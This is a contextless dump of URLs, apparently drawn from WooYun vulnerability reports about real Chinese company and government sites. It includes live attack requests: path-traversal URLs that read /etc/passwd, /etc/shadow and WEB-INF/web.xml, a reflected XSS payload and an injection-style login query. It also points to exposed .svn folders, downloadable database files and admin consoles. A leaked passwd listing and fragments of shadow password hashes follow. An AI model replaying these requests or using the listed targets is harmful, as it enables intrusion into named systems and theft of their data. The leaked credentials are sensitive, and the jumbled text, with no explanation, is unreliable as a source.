http://59.41.9.152/siteadmin/AproDeclare2.aspx?pid=1259&state=0&paid=3854 http://59.41.9.152/WebIM.aspx http://**.**.**.**/bugs/wooyun-2015-0116232而发 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://crm.xinhucaifu.com/login.jsp http://www.mycos.com.cn/admin/index.php/Public/login http://www.cdttjt.com/search/ http://www.ddianle.com/wp-admin/ http://event21.wanmei.com/shenmo/shenmocreate/list.action?flag=10&type=2 http://se-office.ruc.edu.cn/index.php?do=list&channelid=19393 http://z.xywy.com/doc/yjdr/ask.php?doctoruser=yjdr http://z.xywy.com/doc/yjdr/ask.php?doctoruser=yjdr http://exam.daojia.com使用的是tcexam系统。 cn:8188/admin/ http://admin.data.auto.ifeng.com/admin/login.do http://comment.aili.com/index.php?m=comments&a=getlist&sid=1&oid=&uname= http://219.142.180.32:7001/console http://219.142.180.32:7001/key/j.jsp www.lotour.com http://219.143.252.170/seeyon/index.jsp http://www.gzjt.gov.cn http://jrwork.eastcom.com/brm/portalbcs/framework.do?action=index&&action=login https://report.ztgame.com/.svn/entries svn://10.10.102.179:443 svn://10.10.102.179:443 svn:special svn:externals svn:needs-lock https://mail.itestin.com https://exmail.qq.com http://**.**.**.**:8090/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx http://**.**.**.**:8080/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx http://**.**.**.**:8083/lslp/DragFlow/GuangZhou/BussGuid/AddTable.aspx Url:mickey.tudou.com http://person.sac.net.cn/login.action# http://person.sac.net.cn/pages/registration/sac-publicity-report.html http://**.**.**.**/zhidao/question.aspx?pid=18 http://**.**.** http://joycitycrmws.cofco.com:8081/ws_member.asmx?op=CRM_VipSales com:8081 http://202.201.163.2:8080/shelf/curriculum.php?type=name&q=%E8%88%9E%E8%B9%88%E5%AD%A6&submit=%E6%A3%80%E7%B4%A2 http://library.djtu.edu.cn/webphp/shelf/curriculum.php?type=name&q=%E8%88%9E%E8%B9%88%E5%AD%A6&submit=%E6%A3%80%E7%B4%A2 http://fpsale.pywm.com.cn/ http://callcenter.dongfeng-nissan.com.cn/login.aspx http://callcenter.dongfeng-nissan.com.cn/login.aspx http://www.allianz.cn/zh/disclosure_items/financial_information/turn.action http://www.allianz.cn/br.jsp http://**.**.**.**/sns/index.php?app=msgroup&mod=Index&act=index&gid=6199-6198 https://cavpn.ecaic.com http://10.1.67.222/中软的it运维系统弱口令服务器信息泄露 http://122.96.93.126/ http://www.chinagreentown.com/bocadmin/index.php?login http://www.xintai.com/web/user/resetPwd/index.jsp http://www.waawo.cn/media-news.php?id=37 http://www.whaac.gov.cn:8080/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.cfdonline.org.cn/OutPortal_CFD//BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://222.135.78.34/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.rczw.gov.cn/BusinessRegistration/BR_ProjectList.aspx?page=1&procode= http://www.whaac.gov.cn:8080/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.cfdonline.org.cn/OutPortal_CFD//ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rczw.gov.cn/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://222.135.78.34/ProJectControl/LS_ProjectList.aspx?page=1&procode= http://www.rcsp.cn/ViewSource/FujianDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/ViewSource/FujianDownLoad.aspx?id=1 http://222.135.78.34/ViewSource/FujianDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/ViewSource/FujianDownLoad.aspx?id=1 http://www.rczw.gov.cn/ViewSource/FujianDownLoad.aspx?id=1 http://www.rcsp.cn/ViewSource/PrintDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/ViewSource/PrintDownLoad.aspx?id=1 http://222.135.78.34/ViewSource/PrintDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/ViewSource/PrintDownLoad.aspx?id=1 http://www.rczw.gov.cn/ViewSource/PrintDownLoad.aspx?id=1 http://www.rcsp.cn//SecondPages/ItemObjectList.aspx?id=1 http://www.whaac.gov.cn:8080/SecondPages/ItemObjectList.aspx?id=1 http://222.135.78.34/SecondPages/ItemObjectList.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/SecondPages/ItemObjectList.aspx?id=1 http://www.rczw.gov.cn/SecondPages/ItemObjectList.aspx?id=1 http://www.rcsp.cn//SecondPages/ItemDetail.aspx?id=1 http://www.whaac.gov.cn:8080//SecondPages/ItemDetail.aspx?id=1 http://222.135.78.34//SecondPages/ItemDetail.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//SecondPages/ItemDetail.aspx?id=1 http://www.rczw.gov.cn//SecondPages/ItemDetail.aspx?id=1 http://www.rcsp.cn//SecondPages/itemsearchlist.aspx?id=1 http://www.whaac.gov.cn:8080//SecondPages/itemsearchlist.aspx?id=1 http://222.135.78.34//SecondPages/itemsearchlist.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//SecondPages/itemsearchlist.aspx?id=1 http://www.rczw.gov.cn//SecondPages/itemsearchlist.aspx?id=1 http://www.rcsp.cn/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.whaac.gov.cn:8080/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://222.135.78.34/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.rczw.gov.cn/Qiyezhuce/Huanyingguanlin.aspx?id=1 http://www.rcsp.cn/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.whaac.gov.cn:8080/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://222.135.78.34/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.rczw.gov.cn/Qiyezhuce/Yicixinggaozhi.aspx?id=1 http://www.rcsp.cn/login/itemList.aspx?id=1 http://www.whaac.gov.cn:8080/login/itemList.aspx?id=1 http://222.135.78.34/login/itemList.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/login/itemList.aspx?id=1 http://www.rczw.gov.cn/login/itemList.aspx?id=1 http://www.rcsp.cn//FormPage/AttDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080//FormPage/AttDownLoad.aspx?id=1 http://222.135.78.34//FormPage/AttDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD//FormPage/AttDownLoad.aspx?id=1 http://www.rczw.gov.cn//FormPage/AttDownLoad.aspx?id=1 http://www.rcsp.cn/FormControl/AttDownLoad.aspx?id=1 http://www.whaac.gov.cn:8080/FormControl/AttDownLoad.aspx?id=1 http://222.135.78.34/FormControl/AttDownLoad.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/FormControl/AttDownLoad.aspx?id=1 http://www.rczw.gov.cn/FormControl/AttDownLoad.aspx?id=1 http://www.rcsp.cn/FormControl/PubFormPage.aspx?formId=1 http://www.whaac.gov.cn:8080/FormControl/PubFormPage.aspx?formId=1 http://222.135.78.34/FormControl/PubFormPage.aspx?formId=1 http://www.cfdonline.org.cn/OutPortal_CFD/FormControl/PubFormPage.aspx?formId=1 http://www.rczw.gov.cn/FormControl/PubFormPage.aspx?formId=1 http://www.rcsp.cn/EmbedPage/itemsearchlist1.aspx?id=1 http://www.whaac.gov.cn:8080/EmbedPage/itemsearchlist1.aspx?id=1 http://222.135.78.34/EmbedPage/itemsearchlist1.aspx?id=1 http://www.cfdonline.org.cn/OutPortal_CFD/EmbedPage/itemsearchlist1.aspx?id=1 http://www.rczw.gov.cn/EmbedPage/itemsearchlist1.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/ItemDetail.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/ItemDetail.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/ItemDetail.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/itemsearchlist.aspx?id=1 http://221.2.149.28:8090/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://www.wdaac.cn/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://222.135.78.37:8084/zjcs/SecondPages/ItemObjectList.aspx?id=1 http://221.2.149.28:8090/zjcs/login/ItemList.aspx?id=1 http://www.whaac.gov.cn:8090/zjcs/login/ItemList.aspx?id=1 http://www.rszwfwzx.gov.cn:8080/zjcs/login/ItemList.aspx?id=1 http://www.wdaac.cn/zjcs/login/ItemList.aspx?id=1 http://222.135.78.37:8084/zjcs/login/ItemList.aspx?id=1 http://221.2.149.28:8090/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.whaac.gov.cn:8090/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://www.wdaac.cn/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://222.135.78.37:8084/zjcs/issue/similarPaid.aspx?zhongjieID=ZJJG_2015030914101257487 http://221.2.149.28:8090/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.whaac.gov.cn:8090/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://www.wdaac.cn/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://222.135.78.37:8084/zjcs/issue/similarItemList.aspx?dic_code=SYLDKXXBG http://222.135.78.37:8084/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.whaac.gov.cn:8090/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.rszwfwzx.gov.cn:8080/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://www.wdaac.cn/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://222.135.78.37:8084/zjcs/issue/similarPaidList1.aspx?item_id=1ed1f0c7-e89f-4ace-b952-89edbf207624 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.whaac.gov.cn:8090/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.wdaac.cn/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_YWGG.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.whaac.gov.cn:8090/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rszwfwzx.gov.cn:8080/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.wdaac.cn/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://222.135.78.37:8084/zjcs/SecondPages/infodetail_CJXX.aspx?paidID=2b3f5ed2-3dcc-4c09-97ff-75073bd37be015072993745 http://www.rcsp.cn/OutNetChannel/SubItemList.aspx http://www.whaac.gov.cn:8080/OutNetChannel/SubItemList.aspx http://222.135.78.34/OutNetChannel/SubItemList.aspx http://www.cfdonline.org.cn/OutPortal_CFD/OutNetChannel/SubItemList.aspx http://www.rczw.gov.cn/OutNetChannel/SubItemList.aspx http://**.**.**/cispconfig http://www.hzxf12345.gov.cn/appellate/appellate.do?act=commCx http://cip.dongfeng-nissan.com.cn/Login.aspx http://cip.dongfeng-nissan.com.cn/Login.aspx?action=DoLogin https://npass.dongfeng-nissan.com.cn/manage/password/showForgotPassword.htm?username= http://shfw.easthope.cn/backPwd/cubasLogin.htm http://shfw.easthope.cn/css.jsp http://wx.233.com/search/study/?mid=13346&teacher=576 http://223.6.251.5/pssysb.aspx site:lipei.e-dicc.com.cn http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs_vol4/image/2015/05/28/40287ece4d56fdf9014d98b1acd018e3/big/2015-5-28_21124125.JPG http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs/image/2011/11/29/40287ece33b617c40133d8b59fdb0b05/big/201111290822699.JPG http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs/image/2011/11/29/40287ece33b617c40133d8b59fdb0b05/big/201111290322770.JPG http://lipei.e-dicc.com.cn/autoclaim/jsp/picture/picture_single_view.jsp?filep=/nfs_vol4/image/2015/03/13/ff8080814c031955014c0be66b2860c1/big/2015-3-13_23441672.JPG http://cgi.voc.com.cn/app/mobile/push.php?action=get_article_threads&classid=1* http://cbs.cninsure.net/logon/Login.jsp http://cbs.cninsure.net http://183.224.241.26/exportExcelAction_deletePrintFile.action http://www.zmzb.com/ http://www.ccw.com.cn/article/get_eyan_comment http://www.hudai.com/ www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8103.looyu.com/monitor%2Cp0%3Ahttp%253A//www.hudai.com/loan/loan E7F07168D5510DF0E8741451203EEF0B:FG=1 favorite:clipboard:email www.hudai.com http://zjy.ynjyy.cn/DigitalCampus/Stat/ZyShow_left.jsp?id=1 http://219.143.252.178/ http://219.151.48.208:80/ http://www.sklgdu.com/Data/db.mdb http://www.chuanjiang99.com/Data/db.mdb http://www.csmnt.org.cn/Data/db.mdb http://www.tlzey.com/Data/db.mdb http://www.luheng.com.cn/Data/db.mdb http://tjtiankai.com/Data/db.mdb http://www.zsltc.com/Data/db.mdb http://www.tsjjhotel.com/Data/db.mdb http://www.uniforce.cn/Data/db.mdb http://www.ht11-specialvalve.com/Data/db.mdb http://www.ftlib.cn/Data/db.mdb http://www.luheng.com.cn/Data/db.mdb http://www.gremount.com.cn/russian/Data/db.mdb http://www.sunvacationsy.com/Data/db.mdb http://tjdemo.east.net/yiminghuanbao/Data/db.mdb http://www.aetasia.com/Data/db.mdb http://www.ht11-specialvalve.com/Data/db.mdb http://www.bjdchs.com/Data/db.mdb http://www.jx-camera.com/Data/db.mdb http://www.bjdyswhg.com/Data/db.mdb http://www.tjmcy.com/Data/db.mdb http://www.huarichongyin.com.cn/Data/db.mdb http://manage.kktv8.com:9595/applyServer/web/apply/list/2?accessCode=3CFA35 http://manage.kktv8.com:9595/applyServer/web/apply/list/9?accessCode=66D308 http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GrtBuildinfo http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getstorecodebydate http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getstatistics http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=Getbudingbymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetbudingDayamtfram http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetallSalesamt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoredaySalseAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseNobyAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseNobName http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseInfo http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetStoreMonthSalseAmt http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetIndustrybymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetDayIndustrybydatefram http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetDayIndustry http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBuildDatabyCondition http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBuildData http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandbydate http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandBytimeframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetBrandBymonframe http://joycitycrmws.cofco.com:8084/WebAppQuery.asmx?op=GetAnchorStoreSalse http://**.**.**.**/bugs/wooyun-2015-0117447 http://**.**.**.**/index.php?file=service&smid=37 POST:wid=519 http://**.**.**.**/template/template.php https://npass.dongfeng-nissan.com.cn/manage/password/showForgotPassword.htm http://www.youshang.com/ http://zone.wooyun.org/content/22136 http://bbs.aili.com/plugin.php?id=pointsMall:index&type=id app.finance.ifeng.com/gszb/person_ifeng.php?id=152 https://github.com/710270532/python/blob/ee03d64ca8af16fcf07f4f3f39eb8935ffcd28f7/utils/mail.py http://www.wochacha.com www.wochacha.com\/login\/?redirectURL=aHR0cDovL3d3dy53b2NoYWNoYS5jb20v http://**.**.**.**/web/login.asp http://183.60.198.202:8080/script http://180.168.34.2:8080/script http://www.cwan.com/ www.wochacha.com http://www.dqhr.gov.cn/fileDownload.jsp?fileName=../../../../../etc/passwd http://www.dqhr.gov.cn/fileDownload.jsp?fileName=../../../../../etc/shadow root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin flnian:x:500:500::/home/flnian:/bin/bash panwq0459:x:501:501::/home/panwq0459:/bin/bash O9Ez1dcIuwhUVaWSkR7aG1:16052:0:99999:7 gUr53um0:16052:0:99999:7 EglNM0:16056:0:99999:7 http://timber2005.com/ http://timber2005.com/Customer.html http://exam1.timber2005.com http://exam1.timber2005.com/Paper/Paper_Manage.aspx?action=view&infoid=303 http://exam1.timber2005.com/Paper/Paper_Type_Random_Query.aspx?return=../Paper/Paper_Query.aspx&pid=305 http://exam1.timber2005.com/Exam/Exam_Type_Right.aspx?infoid=35 http://202.96.191.190:8081/outside/SearchOrder.aspx http://**.**.**.**/.svn/entries http://api.iron.meiliwu.com/customer/sendVerify?account=18518551855&c_d=2&c_p=ios&c_s=6135f04b&c_u=DB767BCF-9559-40D6-8C83-CC3ABCB342D1&c_v=1.0.0&code=edqc&env=prod http://da.wochacha.com/index.php/da/ajax/login?_dc=1438674485757&user=admin*&pwd=admin&page=1&start=0&limit=25 http://jwc.gdupt.edu.cn/lang/entry/admin_list.php http://www.dqhr.gov.cn/yiliaobaoxianyaopin!getlist.action?name=2 http://oa.guanhao.com:8080/kingdee/file/file_sms_history.jsp?user_id=1 http://oa.guanhao.com:8080/kingdee/file/getSerialNumber.jsp?cplei_id=1 http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1 http://oa.guanhao.com:8080/kingdee/flow_design/flow_class_custom_submit.jsp?class_id=1&action=delete http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://pan.baidu.com/share/home?uk=755521925#category/type=0 http://zs.njust.edu.cn/newzs/manage/articlecount.asp?id=45959 http://**.**.**.**/) http://**.**.**.**:8083/finance80/monitor/title_report_cx.jsp?village_dm=1 http://tmqx.gov.cn/Manage http://**.**.**.**/rzgl/admin/attestation/applicationmanage/attestationinfomanage/apply/newApplyStep03.jsp?actionType=add http://**.**.**.**/rzgl/admin/attestation/applicationmanage/attestationinfomanage/apply/newApplyStep03.jsp?actionType=add http://**.**.**.**/UpLoadFiles/DocumentFiles/5252/20150804211457130053.aspx http://xiaodu.baidu.com/setting/?v=1438694346084 http://110.249.218.68:8090/hbwebxf/ http://218.27.137.242:8080/Server/CmxCS.php?pgid=CS_Remove http://218.27.137.242:8080/Server/CmxGetAppNameByUserName.php?User=1&Pass=1 http://218.27.137.242:8080/ http://222.177.213.190:8888/ http://117.132.15.88:8001/ http://221.224.116.210:81/ http://221.238.243.237:8000/ http://**.**.**.**/admin/ http://www.itestin.com/.svn/entries http://www.itestin.com/images/.svn/entries http://newhome.testin.cn/.svn/entries http://118.194.236.11:8081/projects http://uhome.haier.net:7330/portal/operate/userinfo/registerlist.do http://oa.galaxyasset.com/ResourceFiles/images/login/../../WEB-INF/web.xml http://go189.cn/ http://report.renrenche.com/?resource=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&proc=2 http://www.jxmkaqjc.gov.cn/kjzb/aqkj/201111/t20111125_189483.htm http://www.datebao.com/personal/center/family/1/edit http://www.datebao.com/personal/center/family/182301/edit https://github.com/tradeplat/pyscript/blob/732b34803559d01149417eae36184ca225a32773/OCR_qh.py http://www.soueast-motor.com/主站 http://61.131.6.228:8001/console http://61.131.6.228:8001/wls_Server/a.jsp http://www.soueast-motor.com/test.txt http://www.jjwxc.net/search.php?kw=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&t=1&submit=%B2%E9%D1%AF http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 http://kf.uuzuonline.com/yzsdkcs/question/view/id/30466 http://ko.7daysinn.cn:7711/login.aspx?appID=87&sReturnUrl=http://in.7daysinn.cn/default.aspx http://member.7daysinn.cn:7713/BelongingMebWeb/Pages/UserLogin.aspx?ReturnUrl=http%3a%2f%2fmember.7daysinn.cn%3a7713%2fBelongingMebWeb%2fpages%2fDefault.aspx http://legend.7daysinn.cn/ http://f16.7daysinn.cn:8080/ http://mt.7daysinn.cn/LoginPage.aspx http://plm.7daysinn.cn/account/login.action http://wc.7daysinn.cn:8080/login http://aoe.7daysinn.cn/login http://crm.7daysinn.cn/ http://ms.7daysinn.cn/7/login;jsessionid=FF2288D532BC7AD9D71B0ACD369B7F01#view=login http://study.plateno.com/ http://scm.plateno.cc:8080/main/index#frm=%2Findex_frm http://sa.7daysinn.cn:8080/sale http://b29.plateno.cc:7700/ http://z.xywy.com/dhyslist.htm?city=1&page=5&province=1&search=1&search_keyword=1&speciality1=2&speciality2=1&time=1&price=1 http://ipo.snnu.edu.cn/newsinfo.asp?id=344 http://114.251.251.39/ http://st.hxlife.com http://www.lnredcross.org.cn/bbs/boke/Data/Dvboke.mdb http://www.lnredcross.org.cn/database/%23newasp.mdb http://221.10.28.84:22343/hxtextform_scda/login.jsp http://221.10.28.84:22343/hxtextform_scda/config-browser/showConfig.action http://www.glsc.com.cn/glzq/financing/management/newMother.jsp?fundcode=B40088 http://www.glsc.com.cn/glzq/newCms.do?whichCat=gsdt&method=getNewsPage http://www.glsc.com.cn/glzq/question.do?method=getQuestionByKeyCode2&keyCode=question_gltb http://mail.seu.edu.cn/ http://182.92.10.222/sendMarketingMsgs?productNo=112&mobiles=******&msgContent=hello_wooyun http://creative.pptv.com/creative/detail?id=22 http://zzwjj.gov.cn/ http://www.china-galaxy-inv.com/ www.china-galaxy-inv.com http://sw.gacmotor.com/sw/login-query.action http://med.tcl.com/tcl.rar http://battery.tcl.com/read_news.php?id=25 http://multimedia.tcl.com/en/.svn/entries http://www.ezucoo.com/myezccenter/PersonalInformationShow/PersonalInformationUpdate m153.looyu.com/monitor http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**:8088/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cmsadmin/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/channelpre.jsp http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=cn&infoid=1427161015029071&templetid=1178737873571110&channelcode=A012406 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=women&infoid=1420769259833265&templetid=1370591279687569&channelcode=A120101 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=hnzbcg&infoid=1427249525231904&templetid=1210753703820118&channelcode=A080305 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=xykj&infoid=1435109524005376&templetid=1431914538524590&channelcode=A13010402&userId=10002 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=zsjgyey&infoid=1421716411705260&templetid=1407293364068949&channelcode=A13010201 http://**.**.**.**/cms/cmsadmin/infopub/infopre.jsp?pubtype=D&pubpath=gjsb&infoid=1410924314703164&templetid=1395901402388359&channelcode=A092003 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=portal&infoid=1353296177896134&templetid=1248920904974712&channelcode=A07050753&userId=10002 http://**.**.**.**/gips/cms/infopub/infopre.jsp?pubtype=D&pubpath=A08&infoid=1220333754650169&templetid=1219033608284547&channelcode=A084801&userId=10002 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=null&infoid=1225677064478517&templetid=1179950253073606&channelcode=A010119041010 http://**.**.**.**/cms/cms/infopub/infopre.jsp?pubtype=D&pubpath=portal&infoid=1421892149404164&templetid=1193399467902511&channelcode=A090120030501 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=xykj&webappcode=A13&templetid=1416883303056402&userId=10002 http://**.**.**.**/cms/cms/infopub/indexpre.jsp?pubtype=D&pubpath=cn&webappcode=A01&templetid=1169889841499167 